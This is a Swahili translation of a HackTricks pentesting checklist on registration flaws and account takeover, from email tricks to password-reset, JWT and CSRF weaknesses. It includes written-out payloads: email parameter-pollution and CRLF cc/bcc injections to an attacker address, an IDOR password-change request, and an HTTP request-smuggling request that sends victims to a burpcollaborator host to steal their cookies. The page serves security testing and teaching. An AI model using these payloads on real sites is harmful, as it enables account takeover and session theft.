hacktricks/pentesting-web/registration-vulnerabilities.md

9.7 KiB

Misaada ya Usajili & Udhibiti wa Akaunti

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

WhiteIntel

WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wamedukuliwa na malware za kuiba.

Lengo kuu la WhiteIntel ni kupambana na udhibiti wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.

Unaweza kutembelea tovuti yao na kujaribu injini yao bure hapa:

{% embed url="https://whiteintel.io" %}


Udhibiti wa Usajili

Usajili wa Kulinganisha

  • Jaribu kuzalisha kwa kutumia jina la mtumiaji lililopo
  • Angalia kwa kubadilisha barua pepe:
    • herufi kubwa
    • +1@
    • ongeza alama ya mshale katika barua pepe
    • herufi maalum katika jina la barua pepe (%00, %09, %20)
    • Weka herufi nyeusi baada ya barua pepe: test@test.com a
    • victim@gmail.com@attacker.com
    • victim@attacker.com@gmail.com

Uchunguzi wa Jina la Mtumiaji

Angalia ikiwa unaweza kugundua wakati jina la mtumiaji tayari limeandikishwa ndani ya programu.

Sera ya Nenosiri

Kuunda mtumiaji angalia sera ya nenosiri (angalia ikiwa unaweza kutumia nywila dhaifu).
Katika kesi hiyo unaweza kujaribu kuvunja nguvu za siri.

Udukuzi wa SQL

Angalia ukurasa huu ili kujifunza jinsi ya kujaribu kudhibiti akaunti au kutoa taarifa kupitia SQL Injections kwenye fomu za usajili.

Udukuzi wa Oauth

{% content-ref url="oauth-to-account-takeover.md" %} oauth-to-account-takeover.md {% endcontent-ref %}

Udhaifu wa SAML

{% content-ref url="saml-attacks/" %} saml-attacks {% endcontent-ref %}

Badilisha Barua pepe

Baada ya kusajili jaribu kubadilisha barua pepe na angalia ikiwa mabadiliko haya yanathibitishwa kwa usahihi au yanaweza kubadilishwa kuwa barua pepe za kupindukia.

Uchunguzi Zaidi

  • Angalia ikiwa unaweza kutumia barua pepe za kutumika mara moja
  • Nenosiri ndefu (>200) husababisha DoS
  • Angalia mipaka ya viwango vya uundaji wa akaunti
  • Tumia username@burp_collab.net na uchambue kurudi kwa wito
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR kwenye Vigezo vya API

  1. Mshambuliaji lazima aingie kwenye akaunti yao na kwenda kwenye kipengele cha Badilisha nenosiri.
  2. Anza Burp Suite na Kukamata ombi
  3. Tuma kwenye kichupo cha kurudia na urekebishe vigezo: Kitambulisho cha Mtumiaji/barua pepe
    powershell POST /api/changepass [...] ("fomu": {"barua pepe":"mwathiriwa@email.com","nenosiri":"salama"})

Kitufe Dhaifu cha Kurejesha Nenosiri

Kitufe cha kurejesha nenosiri kinapaswa kuundwa kwa nasibu na kuwa tofauti kila wakati.
Jaribu kubaini ikiwa kitufe hicho kinaisha au ikiwa ni sawa kila wakati, katika baadhi ya matukio algorithmu ya uundaji ni dhaifu na inaweza kudhaniwa. Viwango vifuatavyo vinaweza kutumiwa na algorithmu.

  • Muda wa Mwisho
  • Kitambulisho cha Mtumiaji
  • Barua pepe ya Mtumiaji
  • Jina la Kwanza na la Mwisho
  • Tarehe ya Kuzaliwa
  • Kriptografia
  • Nambari pekee
  • Mfululizo mdogo wa kitufe (herufi kati ya [A-Z,a-z,0-9])
  • Kutumia tena kitufe
  • Tarehe ya Mwisho ya Kupita Kitufe

Kuvuja kwa Kitufe cha Kurejesha Nenosiri

  1. Chochote ombi la kurejesha nenosiri kwa kutumia API/UI kwa barua pepe fulani kama vile: test@mail.com
  2. Angalia majibu ya seva na tafuta resetToken
  3. Kisha tumia kitufe kwenye URL kama https://mfano.com/v3/mtumiaji/nenosiri/rejesha?resetToken=[KITAMBULISHO_CHA_KUREJESHA]&barua pepe=[BARUA_PEPE]

Kurejesha Nenosiri Kupitia Mgongano wa Jina la Mtumiaji

  1. Jisajili kwenye mfumo na jina la mtumiaji linalofanana na jina la mtumiaji wa muhanga, lakini na nafasi nyeupe zilizoingizwa kabla na/au baada ya jina la mtumiaji. k.m: "admin "
  2. Omba kurejesha nenosiri na jina lako la mtumiaji la hila.
  3. Tumia kitufe kilichotumwa kwenye barua pepe yako na urejeshe nenosiri la muhanga.
  4. Unganisha kwenye akaunti ya muhanga na nenosiri jipya.

Jukwaa la CTFd lilikuwa na udhaifu wa shambulio hili.
Angalia: CVE-2020-7245

Kuchukua Udhibiti wa Akaunti Kupitia Udukuzi wa Tovuti ya Msalaba

  1. Tafuta XSS ndani ya programu au kikoa ikiwa vidakuzi vimeelekezwa kwa kikoa cha mzazi: *.domain.com
  2. Vujisha kuki za kikao cha sasa
  3. Thibitisha kama mtumiaji kwa kutumia kuki

Kuchukua Udhibiti wa Akaunti Kupitia Udukuzi wa Ombi la HTTP

  1. Tumia smuggler kugundua aina ya Udukuzi wa Ombi la HTTP (CL, TE, CL.TE)
    powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
  2. Unda ombi litakalobadilisha POST / HTTP/1.1 na data ifuatayo:
    GET http://kitu.burpcollaborator.net HTTP/1.1 X: kwa lengo la kuhamisha waathiriwa kwenye burpcollab na kuiba vidakuzi vyao\
  3. Ombi la mwisho linaweza kuonekana kama ifuatavyo
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Ripoti za Hackerone zinazoexploit bug hii\

Kuchukua Udhibiti wa Akaunti kupitia CSRF

  1. Unda payload kwa CSRF, kwa mfano: "Fomu ya HTML na auto submit kwa mabadiliko ya nenosiri"
  2. Tuma payload

Kuchukua Udhibiti wa Akaunti kupitia JWT

JSON Web Token inaweza kutumika kuthibitisha mtumiaji.

  • Hariri JWT na User ID / Barua pepe nyingine
  • Angalia saini dhaifu ya JWT

{% content-ref url="hacking-jwt-json-web-tokens.md" %} hacking-jwt-json-web-tokens.md {% endcontent-ref %}

Marejeo

WhiteIntel

WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma bure za kuangalia ikiwa kampuni au wateja wake wameathiriwa na malware za wizi.

Lengo kuu la WhiteIntel ni kupambana na kuchukua udhibiti wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.

Unaweza kutembelea tovuti yao na kujaribu injini yao bure hapa:

{% embed url="https://whiteintel.io" %}

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks: